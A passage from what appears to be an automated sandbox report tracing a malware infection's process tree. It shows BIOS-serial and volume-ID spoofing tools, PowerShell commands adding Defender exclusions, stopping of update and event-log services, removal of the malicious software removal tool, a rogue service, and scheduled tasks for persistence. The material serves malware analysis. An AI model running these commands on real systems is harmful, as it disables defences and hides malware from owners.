        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 731044HP-TRGT17010MST
        5⤵
        Executes dropped EXE
        
        PID:3240
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
      4⤵
      PID:1116
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
        5⤵
        Executes dropped EXE
        
        PID:4336
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
      4⤵
      PID:2284
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 31061HP-TRGT5216AB
        5⤵
        Executes dropped EXE
        
        PID:4880
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
      4⤵
      PID:380
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 231061HP-TRGT5216RV
        5⤵
        Executes dropped EXE
        
        PID:2704
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
      4⤵
      PID:1856
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 831061HP-TRGT5216SG
        5⤵
        Executes dropped EXE
        
        PID:4144
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
      4⤵
      PID:1728
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
        5⤵
        Executes dropped EXE
        
        PID:3848
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
      4⤵
      PID:2236
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 531064HP-TRGT15965SL
        5⤵
        Executes dropped EXE
        
        PID:752
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
      4⤵
      PID:1192
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 431064HP-TRGT15965FA
        5⤵
        Executes dropped EXE
        
        PID:2112
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
      4⤵
      PID:2960
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 631067HP-TRGT26713FU
        5⤵
        Executes dropped EXE
        
        PID:628
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
      4⤵
      PID:1276
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 331067HP-TRGT26713DQ
        5⤵
        Executes dropped EXE
        
        PID:1804
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
      4⤵
      PID:4820
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 731067HP-TRGT26713MST
        5⤵
        Executes dropped EXE
        
        PID:3828
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
      4⤵
      PID:3316
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
        5⤵
        Executes dropped EXE
        
        PID:5012
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
      4⤵
      PID:4212
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 31080HP-TRGT4171AB
        5⤵
        Executes dropped EXE
        
        PID:2112
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
      4⤵
      PID:3848
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 231083HP-TRGT14919RV
        5⤵
        Executes dropped EXE
        
        PID:1632
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
      4⤵
      PID:2168
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 831083HP-TRGT14919SG
        5⤵
        Executes dropped EXE
        
        PID:2908
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
      4⤵
      PID:616
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
        5⤵
        Executes dropped EXE
        
        PID:5032
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
      4⤵
      PID:2236
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 531083HP-TRGT14919SL
        5⤵
        Executes dropped EXE
        
        PID:3456
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
      4⤵
      PID:1572
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4204
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 431083HP-TRGT14919FA
        5⤵
        Executes dropped EXE
        
        PID:3364
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
      4⤵
      PID:4272
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 631083HP-TRGT14919FU
        5⤵
        Executes dropped EXE
        
        PID:4552
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
      4⤵
      PID:3212
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 331083HP-TRGT14919DQ
        5⤵
        Executes dropped EXE
        
        PID:3800
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
      4⤵
      PID:4392
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 731083HP-TRGT14919MST
        5⤵
        Executes dropped EXE
        
        PID:2948
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
      4⤵
      PID:4100
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
        5⤵
        Executes dropped EXE
        
        PID:2352
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: 503B-CJGN
      4⤵
      PID:4204
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: 503B-CJGN
        5⤵
        Executes dropped EXE
        
        PID:2156
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: S9TF-UTCE
      4⤵
      PID:3940
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: S9TF-UTCE
        5⤵
        Executes dropped EXE
        
        PID:664
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 0LHO-9AD9
      4⤵
      PID:1836
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 0LHO-9AD9
        5⤵
        Executes dropped EXE
        
        PID:2472
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 7B58-V1N7
      4⤵
      PID:4296
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: 7B58-V1N7
        5⤵
        Executes dropped EXE
        
        PID:4520
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: H3FC-FCU0
      4⤵
      PID:1088
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: H3FC-FCU0
        5⤵
        Executes dropped EXE
        
        PID:4556
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: 87US-J3NK
      4⤵
      PID:3848
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: 87US-J3NK
        5⤵
        Executes dropped EXE
        
        PID:2512
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: O9S2-LU59
      4⤵
      PID:4820
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:2236
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: O9S2-LU59
        5⤵
        Executes dropped EXE
        
        PID:920
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: 3VEJ-J0KB
      4⤵
      PID:4884
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: 3VEJ-J0KB
        5⤵
        Executes dropped EXE
        
        PID:2960
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: 80TT-MU4R
      4⤵
      PID:2024
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: 80TT-MU4R
        5⤵
        Executes dropped EXE
        
        PID:1908
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: FK4J-7T34
      4⤵
      PID:320
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: FK4J-7T34
        5⤵
        Executes dropped EXE
        
        PID:4060
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: PCHP-6TVT
      4⤵
      PID:4308
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: PCHP-6TVT
        5⤵
        Executes dropped EXE
        
        PID:2192
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: GTK9-M3VD
      4⤵
      PID:4912
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: GTK9-M3VD
        5⤵
        
        PID:3368
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: I25Z-EF1H
      4⤵
      PID:4668
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: I25Z-EF1H
        5⤵
        
        PID:428
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: LVAA-Z5DZ
      4⤵
      PID:460
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: LVAA-Z5DZ
        5⤵
        
        PID:4632
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: BTIZ-DIDK
      4⤵
      PID:3788
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: BTIZ-DIDK
        5⤵
        
        PID:4024
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: TK0E-7NO6
      4⤵
      PID:2168
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: TK0E-7NO6
        5⤵
        
        PID:2804
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 4IPP-ILDR
      4⤵
      PID:2640
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: 4IPP-ILDR
        5⤵
        
        PID:1516
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 4DP3-3OEE
      4⤵
      PID:3952
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: 4DP3-3OEE
        5⤵
        
        PID:4804
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 8MM9-JRGE
      4⤵
      PID:4708
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 8MM9-JRGE
        5⤵
        
        PID:4652
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: MGB8-T6RB
      4⤵
      PID:5084
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3364
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: MGB8-T6RB
        5⤵
        
        PID:3992
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: PL29-F2T5
      4⤵
      PID:2208
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: PL29-F2T5
        5⤵
        
        PID:5136
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 0NCU-S70I
      4⤵
      PID:5164
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: 0NCU-S70I
        5⤵
        
        PID:5208
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: SSO0-HBLG
      4⤵
      PID:5348
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: SSO0-HBLG
        5⤵
        
        PID:5476
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
      4⤵
      PID:5368
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
      4⤵
      PID:5420
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
      4⤵
      PID:5468
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
      4⤵
      PID:5532
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
      4⤵
      PID:5568
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
      4⤵
      PID:5632
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
      4⤵
      PID:5672
- - C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
    "C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    PID:4248
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ChainReview\4N7V2tIOe7KSQ8eET3YGuCyK2Y.vbe"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:4336
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ChainReview\8xoM57ln5l3nWVEqwKA0TDOQ0Am35EOuQMtKP.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5088
      - C:\ChainReview\sphyperRuntimedhcpSvc.exe
        
        "C:\ChainReview/sphyperRuntimedhcpSvc.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        
        PID:4712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\.conhostsft.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:372
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\conhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\L2Schemas\wininit.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5032
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ChainReview\fontdrvhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4548
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\defaults\pref\WmiPrvSE.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4216
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lDqah0Z8kK.bat"
        7⤵
        
        PID:4204
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        8⤵
        
        PID:380
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        8⤵
        
        PID:2992
        
        C:\Recovery\WindowsRE\.conhostsft.exe
        
        "C:\Recovery\WindowsRE\.conhostsft.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: GetForegroundWindowSpam
        
        PID:3464
- - C:\Users\Admin\AppData\Roaming\conhostsft.exe
    "C:\Users\Admin\AppData\Roaming\conhostsft.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3640
  - - C:\Users\Admin\AppData\Roaming\.conhostsft.exe
      "C:\Users\Admin\AppData\Roaming\.conhostsft.exe"
      4⤵
      Executes dropped EXE
      Drops file in System32 directory
      PID:1888
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:868
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:1988
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:3292
      - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:4168
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:4708
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:4984
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:3996
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        5⤵
        Launches sc.exe
        
        PID:2920
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        5⤵
        Launches sc.exe
        
        PID:2300
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3420
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        5⤵
        
        PID:1728
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        5⤵
        
        PID:2960
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        5⤵
        
        PID:4992
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        5⤵
        
        PID:1204
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "driverupdate"
        5⤵
        Launches sc.exe
        
        PID:4556
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:2660
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:4436
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "driverupdate"
        5⤵
        Launches sc.exe
        
        PID:1976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn ".conhostsft." /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\.conhostsft.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1448

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn ".conhostsft" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\.conhostsft.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn ".conhostsft." /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\.conhostsft.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3600

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3492

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2472

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Recovery\WindowsRE\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Windows\L2Schemas\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\L2Schemas\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2156

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Windows\L2Schemas\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:628

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\ChainReview\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2152

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\ChainReview\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\ChainReview\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4260

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 12 /tr "'C:\Program Files\Mozilla Firefox\defaults\pref\WmiPrvSE.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4032

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\defaults\pref\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3868

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 9 /tr "'C:\Program Files\Mozilla Firefox\defaults\pref\WmiPrvSE.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4232

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:408

